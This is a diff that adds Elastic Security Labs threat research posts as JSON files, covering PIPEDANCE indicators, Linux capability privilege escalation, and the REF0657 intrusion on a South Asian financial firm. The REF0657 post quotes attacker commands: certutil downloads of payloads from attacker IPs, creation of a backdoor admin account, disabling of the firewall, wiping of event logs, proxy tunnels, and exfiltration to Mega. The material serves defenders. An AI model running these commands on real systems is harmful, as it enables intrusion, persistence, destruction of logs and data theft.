It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Reconnaissance](https://attack.mitre.org/tactics/TA0043/)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)\n- [Collection](https://attack.mitre.org/tactics/TA0009)\n- [Command and control](https://attack.mitre.org/tactics/TA0011/)\n- [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n\n### Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)\n- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)\n- [Process discovery](https://attack.mitre.org/techniques/T1057/)\n- [Process injection: thread execution hijacking](https://attack.mitre.org/techniques/T1055/003/)\n- [Token impersonation/theft](https://attack.mitre.org/techniques/T1134/001/)\n- [Lateral tool transfer](https://attack.mitre.org/techniques/T1570/)\n- [Internal proxy](https://attack.mitre.org/techniques/T1090/001/)\n- [Inter-Process communication](https://attack.mitre.org/techniques/T1559/)\n- [Application layer protocol](https://attack.mitre.org/techniques/T1071/)\n- [Obfuscated files or information](https://attack.mitre.org/techniques/T1027)\n- [Create or modify system process: Windows service](https://attack.mitre.org/techniques/T1543/003/)\n\n## Observables\n\nAll observables are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf10ee41eec4f6caf/63fcd87852820c02597c04f3/1326-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Indicator | Type | Reference |\n| 
---------------------------------------------------------------- | ------- | ------------------------------- |\n| 9d3f739e35182992f1e3ade48b8999fb3a5049f48c14db20e38ee63eddc5a1e7 | SHA-256 | PIPEDANCE server-side component |\n| 805a4250ec1f6b99f1d5955283c05cd491e1aa378444a782f7bd7aaf6e1e6ce7 | SHA-256 | Cobalt Strike beacon |\n| exl.officeappsreviews[.]com/lanche-334e58sfj4eeu7h4dd3sss32d | URL | Cobalt Strike C2 server |\n"
+ },
+ "title": "Twice around the dance floor - Elastic discovers the PIPEDANCE backdoor",
+ "slug": "twice-around-the-dance-floor-with-pipedance",
+ "subtitle": "Elastic Security Labs describes the PIPEDANCE backdoor",
+ "date": "2023-02-27",
+ "description": "Elastic Security Labs is tracking an active intrusion into a Vietnamese organization using a recently discovered triggerable, multi-hop backdoor we are calling PIPEDANCE. This full-featured malware enables stealthy operations through the use of named",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "photo-edited-12@2x.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ref1326",
+ "pipedance"
+ ]
+ },
+ "id": "security_labs_content-twice_around_the_dance_floor_with_pipedance-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md.json
new file mode 100644
index 00000000000..393ab34e9ea
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unlocking Power Safely: Privilege Escalation via Linux Process Capabilities\"\nslug: \"unlocking-power-safely-privilege-escalation-via-linux-process-capabilities\"\nsubtitle: \"\"\ndate: \"2024-03-27\"\ndescription: \"Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.\"\nauthor:\n - slug: shashank-k-s\nimage: \"Security Labs Images 36.jpg\"\ncategory:\n - slug: security-operations\ntags:\n - linux\n - privilege-escalation\n---\n\n## Preamble\n\nIn the realm of Linux security, administrators constantly grapple with a delicate balance between safeguarding sensitive system resources and accessibility. One helpful avenue that has garnered considerable attention in recent years is privilege escalation via Linux process capabilities. While traditional Unix-like permissions offer coarse-grained control over access rights, process capabilities provide a nuanced approach, allowing specific processes to wield elevated privileges without necessitating full root access.\n\nThis publication delves into the intricate world of privilege escalation through Linux process capabilities, unraveling its mechanisms, implications, and indispensable role in fortifying system security. Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.\n\n## Linux Process Capabilities\n\nLinux process capabilities allow users to fine-tune the permissions and privileges of processes running on a Linux system. 
Traditionally, Linux used a simple binary approach to process permissions: either a process ran with full root privileges (superuser) or a regular user's limited privileges.\n\nHowever, this binary approach proved too inflexible for security use cases, especially those requiring elevated privileges for only certain operations. To address this, Linux introduced capabilities that allow processes to have a subset of the privileges traditionally associated with the root user. By default, elevated privileges are obtained through the “substitute user, do” (```sudo```) subsystem: the ```sudo``` command allows users to temporarily escalate their privileges to execute administrative tasks as the superuser or another user. By comparison, process capabilities provide a more granular way to grant specific privileges to processes.\n\nHere's how Linux process capabilities work:\n\n 1. **Role-based privileges**: In the traditional Unix security model, the superuser (root) has unrestricted access to all system resources and operations. Any process running with root privileges can perform any action on the system.\n\n 2. **Capability-based privileges**: With capabilities, specific privileges are split from the root user's authority and can be assigned to processes individually. This allows processes to be granted only the specific privileges they need to perform their tasks rather than granting them full root access. Capabilities can be assigned to individual executable files or running processes. When an executable file is launched, it can be configured to retain or drop certain capabilities. Similarly, capabilities can be added or removed from a running process using tools like `setcap` (to set file capabilities) or `capsh` (to create a capability shell wrapper).\n\n 3. **Capability groups**: Linux capabilities are divided into distinct types, each representing a different set of privileges. 
Some examples of capabilities include ```CAP_SYS_ADMIN``` (perform a range of system administration tasks), ```CAP_NET_ADMIN``` (configure network interfaces), and ```CAP_DAC_OVERRIDE``` (bypass file read/write permission checks). \n\n 4. **Effective and permitted capabilities**: Each process has two sets of capabilities—the effective and permitted sets. The effective set determines which capabilities the process can use at any given time, while the permitted set determines which capabilities it can gain via privilege escalation.\n\n 5. **Capability bounding set**: A bounding set of capabilities defines a ceiling on the capabilities a process can acquire, even through privilege escalation. This is a security feature to prevent unauthorized elevation of privileges.\n\nLinux process capabilities offer a more granular approach to managing privileges, enhancing security by reducing processes' attack surface while still allowing them to perform necessary tasks - of course, subject to operator error! They're particularly useful in scenarios where certain operations require elevated permissions, but granting full root access would be excessive and potentially risky.\n\n## Privilege Escalation via Linux process capabilities\n\nPrivilege escalation via Linux process capabilities involves exploiting misconfigurations or vulnerabilities to gain additional privileges beyond a process's intended purpose. While capabilities are meant to provide a more granular and secure approach to privilege management, they can still be misused or misconfigured, leading to potential security risks. This section will explore some ways privilege escalation via process capabilities can occur.\n\n 1. 
**Incorrectly set capabilities**: If an executable file has capabilities assigned to it that it doesn't need to perform its intended functions, an attacker could potentially exploit this by running the file to gain those extra privileges.\n - The risk: An attacker could exploit a misconfiguration where a binary has unnecessary set user identity (```setuid```) capabilities assigned to it. The attacker can access those capabilities by executing the binary, potentially escalating their privileges.\n - Example: Suppose a setuid binary ```/usr/bin/example_binary``` has the ```CAP_SYS_ADMIN``` capability set. If this capability is unnecessary, an attacker could exploit it by executing the binary and gaining elevated privileges.\n\n 2. **Capability leaking**: Sometimes a child process inherits capabilities from its parent process. If a parent process has more capabilities than necessary and spawns a child process, the child process could inherit these capabilities, potentially giving it more privileges than intended.\n - The risk: If a privileged parent process spawns a child process without dropping unnecessary capabilities, the child may inherit capabilities it doesn't require.\n - Example: A web server process runs with elevated privileges due to its requirements but spawns a child process to handle user requests. When a web server spawns child processes, it typically does so to handle incoming client requests efficiently. Each child process is responsible for servicing one or more client connections, allowing the web server to handle multiple requests concurrently. However, in certain scenarios, child processes spawned by a web server might inadvertently inherit unnecessary privileges or capabilities that the web server doesn't require. This can introduce security risks, as these child processes might have access to capabilities or resources beyond what is necessary to serve web requests. 
When a web server spawns child processes using a generic process creation mechanism without explicitly dropping unnecessary privileges or capabilities, these child processes might inherit the capabilities of the parent process. This could include capabilities such as creating raw network sockets, manipulating the firewall, or accessing sensitive files or system resources.\n\n 3. **Exploiting vulnerable setuid/setgid binaries**: Some ```setuid``` or ```setgid``` binaries may have capabilities assigned to them. If an attacker can abuse one of these binary misconfigurations, they may be able to execute arbitrary code with the elevated capabilities granted to the binary, leading to privilege escalation.\n - The risk: Exploiting vulnerabilities in setuid or setgid binaries with elevated capabilities can lead to privilege escalation.\n - Example: A vulnerable ```setuid``` binary, such as ```/bin/su```, may have a flaw that allows an attacker to execute arbitrary code with elevated capabilities, effectively escalating their privileges to root.\n\n 4. **Kernel vulnerabilities**: Since the Linux kernel enforces capabilities, vulnerabilities in the kernel could potentially be exploited to bypass capability checks and gain elevated privileges.\n - The risk: Vulnerabilities in the Linux kernel itself could be exploited to bypass capability checks and gain elevated privileges.\n - Example: Suppose a kernel vulnerability allows an attacker to manipulate capability checks. By exploiting this vulnerability, an attacker could bypass capability checks and gain access to capabilities they are not supposed to have.\n\n 5. 
**Capability bounding set misconfiguration**: If the capability bounding set is not properly configured, processes could gain additional capabilities through privilege escalation techniques.\n - The risk: An attacker could exploit the capability bounding set to gain additional capabilities through techniques such as using the ```ptrace``` system call to observe and control the execution of another process.\n - Example: An attacker could abuse a misconfigured capability bounding set to allow their malicious process to trace and control another process, effectively gaining its capabilities.\n\n 6. **Abusing file attributes**: Linux filesystems support extended attributes, including file capabilities. If an attacker gains control of a file with elevated capabilities, they may be able to execute the file and gain those capabilities, potentially leading to privilege escalation.\n - The risk: Exploiting extended attributes, including file capabilities, could allow an attacker to execute a file with elevated capabilities, leading to privilege escalation.\n - Example: An attacker could gain control of a file with elevated capabilities, such as ```CAP_NET_ADMIN```, and execute it to gain those capabilities, potentially escalating their privileges to perform network-related tasks beyond their intended scope.\n\n## Mitigating the risks of Privilege Escalation\n\nMitigating privilege escalation via process capabilities involves implementing several security best practices to reduce the risk of unauthorized access to elevated privileges. Here are some key practices to consider:\n\n 1. **Least Privilege Principle**: Follow the principle of least privilege by assigning only the necessary capabilities to processes and users. Limit capabilities to what is required for specific tasks, avoiding assigning unnecessary privileges.\n\n 2. **Regular Auditing and Review**: Conduct regular audits and reviews of the capabilities assigned to executable files, processes, and users. 
Ensure that capabilities are accurately assigned based on the principle of least privilege.\n\n 3. **Secure Configuration of Setuid/Setgid Binaries**: Review and restrict capabilities assigned to these binaries to prevent unauthorized privilege escalation.\n\n 4. **Capability Bounding Set Configuration**: Properly configure the capability bounding set to restrict the capabilities acquired through privilege escalation techniques such as ```ptrace```. Limit the capabilities available to processes, especially those with elevated privileges.\n\n 5. **Kernel and Software Updates**: The Linux kernel and all software components should be updated with the latest security patches. Updates should be applied regularly to mitigate potential vulnerabilities that could be exploited for privilege escalation.\n\n 6. **Security Hardening**: Implement security hardening measures to strengthen the system's overall security posture. This includes configuring and deploying security-enhancing mechanisms such as SELinux (Security-Enhanced Linux) or AppArmor to enforce mandatory access controls and confinement policies.\n\n 7. **Filesystem Integrity Checks**: Implement filesystem integrity checks to detect unauthorized changes to files, including those with extended attributes such as capabilities. \n\n 8. **Monitoring and Logging**: Implement robust monitoring and logging mechanisms to detect and track suspicious activities related to privilege escalation attempts. Monitor system logs, audit trails, and security events to identify unauthorized access attempts or unusual behavior.\n\nEven with all these measures in place to mitigate the risks of privilege escalation via Linux process capabilities, misconfigurations can still slip into infrastructure, providing attackers a window of opportunity to exploit and gain control. 
The next section describes how Elastic Security helps detect privilege escalation use cases for process capabilities.\n\n## Detect Privilege Escalation using Elastic Security \n\nIn [Elastic 8.11](https://www.elastic.co/blog/whats-new-elastic-security-8-11-0), new detection rules were added to detect discovery and privilege escalation involving Linux process capabilities. Users can leverage these Elastic prebuilt rules by following the guidelines to [install and manage Elastic prebuilt rules](https://www.elastic.co/guide/en/security/8.11/prebuilt-rules-management.html). To enable and organize these specific rules, refer to the [manage detection rules](https://www.elastic.co/guide/en/security/8.11/rules-ui-management.html) guidelines. \n\nTo gain visibility into Linux process capabilities, users can also enable specific prebuilt rules from the list below:\n - [Process Capability Enumeration](https://www.elastic.co/guide/en/security/current/process-capability-enumeration.html)\n - [Potential Privilege Escalation via Linux DAC permissions](https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-linux-dac-permissions.html)\n - [Potential Privilege Escalation via Enlightenment](https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-enlightenment.html)\n - [Privilege Escalation via GDB CAP_SYS_PTRACE](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-gdb-cap-sys-ptrace.html)\n - [Root Network Connection via GDB CAP_SYS_PTRACE](https://www.elastic.co/guide/en/security/current/root-network-connection-via-gdb-cap-sys-ptrace.html)\n - [Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-cap-chown-cap-fowner-capabilities.html)\n - [Privilege Escalation via CAP_SETUID/SETGID Capabilities](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-cap-setuid-setgid-capabilities.html)\n - 
Some Building Block Rules \n - [Network Traffic Capture via CAP_NET_RAW](https://www.elastic.co/guide/en/security/current/network-traffic-capture-via-cap-net-raw.html)\n - [CAP_SYS_ADMIN Assigned to Binary](https://www.elastic.co/guide/en/security/current/cap-sys-admin-assigned-to-binary.html)\n\n_Important Elastic Infrastructure Note_: Stack, Agent, and Policy are all advised to be on 8.11+ for capturing Linux process capabilities. Of the available Linux process thread capability sets, only the two sets below are captured on Elastic 8.11+ infrastructure.\n - `CapPrm` (permitted capabilities): the capabilities that a process is allowed to assume.\n - `CapEff` (effective capabilities): the capabilities with which the current process is executing.\n\n## Conclusion\n\nIn the realm of Linux security, understanding process capabilities and their role in privilege escalation is paramount. By granting specific processes elevated privileges without resorting to full root access, this mechanism enhances the security posture of systems by limiting the potential impact of compromised processes. However, this power comes with greater responsibility; misconfigurations or misuse of process capabilities can introduce new avenues for exploitation.\n\nWe've uncovered the nuanced interplay between process capabilities and traditional permission models, such as sudo, highlighting their complementary roles in access control. As administrators, it's imperative to implement robust practices for managing and auditing process capabilities, ensuring that only trusted processes are granted the necessary privileges.\n\nFurthermore, as the Linux ecosystem continues to evolve, maintaining awareness of updates and best practices in process capability management is essential. 
Through vigilance, education, and the adoption of security-first principles, we can fortify our systems against emerging threats while maintaining the flexibility and functionality necessary for modern computing environments. \n\nWith Elastic Defend’s proactive approach to privilege escalation via Linux process capabilities, we can bolster the security foundations of our systems and safeguard against potential exploits in an ever-changing threat landscape.\n"
+ },
+ "title": "Unlocking Power Safely: Privilege Escalation via Linux Process Capabilities",
+ "slug": "unlocking-power-safely-privilege-escalation-via-linux-process-capabilities",
+ "subtitle": "",
+ "date": "2024-03-27",
+ "description": "Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.",
+ "author": [
+ {
+ "slug": "shashank-k-s"
+ }
+ ],
+ "image": "Security Labs Images 36.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ }
+ ],
+ "tags": [
+ "linux",
+ "privilege-escalation"
+ ]
+ },
+ "id": "security_labs_content-unlocking_power_safely_privilege_escalation_via_linux_process_capabilities-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unmasking_financial_services_intrusion_ref0657-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unmasking_financial_services_intrusion_ref0657-md.json
new file mode 100644
index 00000000000..8bf5140a336
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unmasking_financial_services_intrusion_ref0657-md.json
@@ -0,0 +1,39 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unmasking a Financial Services Intrusion: REF0657\"\nslug: \"unmasking-financial-services-intrusion-ref0657\"\nsubtitle: \"Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.\"\ndate: \"2024-01-31\"\ndescription: \"Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.\"\nauthor:\n - slug: daniel-stepanic\n - slug: salim-bitam\n - slug: andrew-pease\nimage: \"photo-edited-08@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref0657\n - nps\n - cobalt strike\n - iox\n - rakshasa\n - supershell\n---\n\n## Preamble\n\nIn December of 2023, Elastic Security Labs detected a smash-and-grab style intrusion directed at a financial services organization in South Asia. Throughout the breach, a diverse set of open-source tools were employed within the victim's environment, some of which we encountered for the first time. The threat group engaged in different post-compromise activities: from discovery/enumeration to utilizing the victim's internal enterprise software against them and eventually leveraging different tunnelers and side-loading techniques to execute Cobalt Strike. In addition, the adversary used the file hosting service Mega to exfiltrate data from the network.\n\nBy disclosing the details of this intrusion set (REF0657) and the various tactics, techniques, and procedures (TTPs), we hope to assist fellow defenders and organizations in recognizing and monitoring this type of activity. 
\n\n### Key takeaways\n\n* REF0657 targeted financial services in South Asia\n* This group leveraged a broad range of post-compromise behaviors, including backdoor access using Microsoft SQL Server, dumping credentials, wiping event logs, and exfiltrating data using MEGA CMD\n* The activity included an assortment of network tunnelers and proxy tools as well as Cobalt Strike and ties to infrastructure using the C2 framework, Supershell\n\n## Campaign analysis \n\nOur team identified the initial enumeration happening in a customer environment on December 17, 2023. While we didn't have visibility around the root cause of the infection, we continued to monitor the environment. Over the next several weeks, we discovered seven different hosts, mainly servers, exhibiting a large swath of activity, including:\n\n* Discovery/enumeration\n* Downloading additional tools/components\n* Renaming and staging tools in legitimate folder locations in the environment\n* Dumping credentials from the registry and adding users to machines\n* Modifying the environment to enable lateral movement and persistence\n* Executing proxy tunnelers and shellcode to maintain access into the environment\n* Compressing and exfiltrating data using cloud services provider Mega\n* Wiping event logs on multiple machines \n\n## Execution Flow / Timeline\n\nA significant portion of the activity observed by our team came through command-line execution abusing Microsoft SQL Server (`sqlservr.exe`). While we couldn’t pinpoint the root cause, we have reason to believe the attacker gained access to the environment through this remotely accessible server and then started executing commands and running programs using the MSSQL stored procedure (`xp_cmdshell`). This initial endpoint served as the beachhead of the attack, from which all activity seemed to originate.\n\n### Discovery/Enumeration/Staging\n\nThe threat actor used several standard Windows utilities for initial discovery and enumeration. 
The following graphic shows the different commands spawned from the parent process (`sqlservr.exe`):\n\n\n\n\nOftentimes, the attacker checked to verify their payloads were running, reviewed network connections on victim machines, and performed directory listings to check on their different files.\n\nAfter initial access was gained, the actor tried several methods for downloading additional payloads and tooling. The adversary started to use `certutil.exe` and then moved to `bitsadmin.exe`, PowerShell’s `DownloadFile()` method, and eventually back to `certutil.exe`. These different tools interacted with IP addresses (`149.104.23[.]17` and `206.237.3[.]150`).\n\n\n\n\n### Lateral Movement + Persistence\n\nAs the actors moved in the environment, they leveraged remote SMB and WMI to create a local administrator account named \"helpdesk\" on each machine. In some cases, they set up a randomly named Windows service (`qLVAMxSGzP`) as a persistence mechanism. This service would execute a temporary batch file with commands to add a local user and insert this user into the local administrator group. After execution, the file would then be deleted. \n\n```\n%COMSPEC% /Q /c echo net user helpdesk P@ssw0rd /add && \\ \nnet localgroup administrators helpdesk /add \\ \n^> \\\\127.0.0.1\\C$\\FOUGTZ 2^>^&1 > %TEMP%\\VOruiL.bat & \\ \n%COMSPEC% /Q /c %TEMP%\\VOruiL.bat & %COMSPEC% /Q /c del %TEMP%\\VOruiL.bat\n```\n\n### Execution\n\nThe adversary moved to Cobalt Strike for C2 and further execution. This time, they used a legitimately signed version of Trend Micro’s Deep Security Monitor (`ds_monitor.exe`). This was used to load Cobalt Strike by side-loading a malicious DLL (`msvcp140.dll`). 
We observed the download of the DLL from a `certutil.exe` execution, and then we confirmed this behavior via call stack telemetry.\n\n```\n\"C:\\Windows\\system32\\cmd.exe\" /c certutil -urlcache -split -f \\ \nht\"\"\"\"tp://206.237.3[.]150:443/1.txt \\ \nC:\\users\\public\\downloads\\msvcp140.dll\n```\n\nThe screenshot below shows that the actor placed the TrendMicro application inside a directory labeled McAfee in ProgramData. We can see the malicious DLL being loaded from the same directory by checking the call stack.\n\n\n\n\nShortly after, Run Key persistence was added to execute (`ds_monitor.exe`) on system startup.\n\n```\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \\ \nTrendMicro /t REG_SZ /d \\ \n\"C:\\ProgramData\\McAfee\\TrendMicro\\ds_monitor.exe\" /f /reg:64\n```\n\nAn analysis of `msvcp140.dll` reveals that the threat actor tampered with the DllEntryPoint of the legitimate Windows DLL by substituting it with modified code sourced from a public [repository](https://github.com/ShadowMccc/MemoryEvasion) - this is a custom Cobalt Strike memory evasion loader.\n\n\n\n\nWhile the original code retrieved the Cobalt Strike beacon from memory, the altered version loads a beacon in base64 format from a file named `config.ini` that connects to `msedge[.]one`.\n\n### Dumping credentials\n\nOne of the main methods observed for gathering credentials was dumping the Security Account Manager (SAM) registry hive on different servers.\n\n\n\n\n### Network/Registry/Logging Modifications \n\nThe threat actor modified several different configurations and settings to help further increase their access to the environment. 
One of our first observations of this behavior was [enabling RDP](https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-localsessionmanager-fdenytsconnections) (set value to 0) through the registry at the following path (`HKLM\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections`). Then, they disabled the Windows Firewall rules using the command: `NetSh Advfirewall set allprofiles state off`.\n\nAfterward, they enabled [Restricted Admin](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)#restricted-admin-mode-for-remote-desktop-connection) mode through a registry modification, which allowed the adversary to conduct pass-the-hash style attacks against Remote Desktop Protocol (RDP). \n\n```\ncmd.exe /Q /c REG ADD \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" \\ \n/v DisableRestrictedAdmin /t REG_DWORD /d 00000000 \\ \n/f 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\RExePi 2>&1\n```\n\nIn addition to these changes, the attacker also wiped the Windows event logs for System and Security notifications using the Windows Event Utility, `wevtutil.exe`:\n\n```\ncmd.exe /Q /c wevtutil.exe cl System 1> \\ \n\\\\127.0.0.1\\C$\\Windows\\Temp\\ksASGt 2>&1\n\ncmd.exe /Q /c wevtutil.exe cl Security 1> \\ \n\\\\127.0.0.1\\C$\\Windows\\Temp\\uhxJiw 2>&1\n```\n\n### Tunneling/Proxy Tools\n\nA day after initial access, the adversary generated several shellcode injection alerts using `AppLaunch.exe` (a binary that manages and executes applications built with Microsoft's .NET Framework), outputting the results to a file called `1.txt`. 
The command line argument associated with this alert is as follows: `c:\\programdata\\AppLaunch.exe proxy -r 206.237.0[.]49:12355 >> 1.txt`\n\nAfter examining the injected code, we identified the shellcode as a Golang binary known as `iox`, which can be compiled from the following publicly available [repository](https://github.com/EddieIvan01/iox). This tool is designed for port forwarding and proxying with additional features such as traffic encryption. Based on the observed command line, the attacker established a proxy connection to `206.237.0[.]49` on port `12355`.\n\nIntended or not, the proxy utility was launched by several different legitimate processes: `lsass.exe`, `vmtoolsd.exe`, and `mctray.exe`. In this case, the threat actor side-loaded a common malicious unsigned DLL (`mscoree.dll`) located in the `C:\\programdata\\` directory.\n\n\n\n\nThe actor employed another proxy known as [Rakshasa](https://github.com/Mob2003/rakshasa), downloaded directly from the tool's official GitHub page using the `certutil` command. It was stored in `c:\\users\\public\\downloads\\ra.exe`, and then executed with the following command:\n`C:\\Windows\\system32\\cmd.exe /C C:\\Users\\Public\\Downloads\\ra.exe -d 149.104.23[.]176:80`.\n\nThis command creates a proxy tunnel to the threat actor infrastructure, connecting to the IP address `149.104.23.176` on port `80`. If that wasn’t enough, the actor started to send and retrieve data from the network through ICMP tunneling. For example, when the actor executed the tasklist command, the output was saved to `C:\\programdata\\re.txt`, and exfiltrated through ICMP using PowerShell.\n\n\n\n\n### Exfiltration\n\nOne of the more noteworthy parts of this intrusion was centered around the adversary downloading [MEGA Cmd](https://mega.io/cmd), a command-line utility that works with the Mega file hosting service. 
While still leveraging MSSQL, they downloaded this program, renaming it to `ms_edge.exe`.\n\n```\n\"C:\\Windows\\system32\\cmd.exe\" /c certutil -urlcache -split -f \\ \nht\"\"\"\"tp://206.237.3.150:443/megacmd.exe \\ \nC:\\users\\public\\downloads\\ms_edge.exe\n```\n\nShortly after, we observed this utility being executed with an argument to a configuration file (called `tmp`) and a compressed file stored with a backup extension (`.bak`) being used in conjunction with Mega.\n\n```\nC:\\users\\public\\downloads\\ms_edge.exe --config \\ \nC:\\users\\public\\downloads\\tmp copy \\ \nREDACTED_FILENAME.bak mega_temp:\n```\n\n### Infrastructure\n\nThroughout this investigation, the threat group used several servers to host their payloads or forward network traffic. The Elastic Security Labs team discovered two web servers with open directories hosting files publicly reachable on: \n\n* `206.237.3[.]150`\n* `206.237.0[.]49` \n\n![Open directory at 206.237.3[.]150](/assets/images/unmasking-financial-services-intrusion-ref0657/image3.png \"Open directory at 206.237.3[.]150\")\n\n\nIn addition, our team observed a [Supershell](https://github.com/tdragon6/Supershell/tree/main) panel, a Chinese-based C2 platform, running on `206.237.0[.]49:8888`.\n\n![Supershell Panel on 206.237.0[.]49](/assets/images/unmasking-financial-services-intrusion-ref0657/image1.png \"Supershell Panel on 206.237.0[.]49\")\n\n\nWe validated an earlier finding when we found a configuration file (referred to as `tmp` in the Exfiltration section) used for automation with the Mega platform, containing credentials used by the adversary. 
As well, there was a variety of web shell files and scripts originating from the following public repositories:\n\n* [https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md#abusing-ssrf-in-aws-ec2-environment](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md#abusing-ssrf-in-aws-ec2-environment)\n* [https://github.com/tutorial0/WebShell/blob/master/Aspx/ASPXspy.aspx](https://github.com/tutorial0/WebShell/blob/master/Aspx/ASPXspy.aspx)\n* [https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.ashx](https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.ashx)\n\nFurthermore, within these directories, we identified a few interesting binaries:\n\n**cloud_init**\n\nOne of the files (`cloud_init`) is a Golang ELF binary packed with UPX. After inspection, it was determined that it was compiled from the [NPS repository](https://github.com/ehang-io/nps/tree/master), another intranet proxy server compatible with most common protocols. The threat actor altered the code to encrypt the strings during compilation. The decryption process uses separate byte arrays where the bytes of one array are combined with the bytes of the other array, employing operations such as addition, XOR, or subtraction for the decryption.\n\n\n\n\n**MSASN1.dll**\n\nAfter review, this DLL matched the same functionality/code as the previously discussed file (`msvcp140.dll`).\n\n### REF0657 through MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n#### Tactics\n\nTactics represent the why of a technique or sub-technique. The adversary’s tactical goal is the reason for performing an action. 
The tactics observed in REF0657 were:\n\n* [Lateral Movement](https://attack.mitre.org/tactics/TA0008/)\n* [Persistence](https://attack.mitre.org/tactics/TA0003/)\n* [Execution](https://attack.mitre.org/tactics/TA0002/)\n* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n* [Discovery](https://attack.mitre.org/tactics/TA0007/)\n* [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n\n#### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action. Elastic Security Labs observed the following techniques within REF0657:\n\n* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)\n* [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)\n* [Masquerading](https://attack.mitre.org/techniques/T1036/)\n* [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)\n* [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)\n* [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)\n\n## Summary\n\nIn summary, this intrusion highlighted some new tooling while re-emphasizing that not all intrusions are dictated by novel malware and techniques. These types of threats demonstrate the real-world challenges most organizations are faced with daily. \n\nThe threat group moved very quickly in this environment: within almost 24 hours, data meaningful to the attacker had been extracted from the network. 
Sharing these details can help defenders plug possible holes or gaps in coverage of these techniques.\n\n### The Diamond Model\n\nElastic Security Labs utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, leveraging Activity Threading (section 8) to create relationships between incidents with an adversary-centered (section 7.1.4) approach allows for a single, albeit cluttered, diamond.\n\n\n\n\n## Detecting REF0657\n\nThe following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:\n\n### Detection\n\n* [Direct Outbound SMB Connection](https://www.elastic.co/guide/en/security/current/direct-outbound-smb-connection.html#direct-outbound-smb-connection)\n* [Execution via MSSQL xp_cmdshell Stored Procedure](https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp-cmdshell-stored-procedure.html)\n* [Execution via Renamed Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_execution_via_renamed_signed_binary_proxy.toml)\n* [Potential Remote Credential Access via Registry](https://www.elastic.co/guide/en/security/current/potential-remote-credential-access-via-registry.html)\n* [Process Execution from an Unusual Directory](https://www.elastic.co/guide/en/security/current/process-execution-from-an-unusual-directory.html)\n* [Suspicious CertUtil 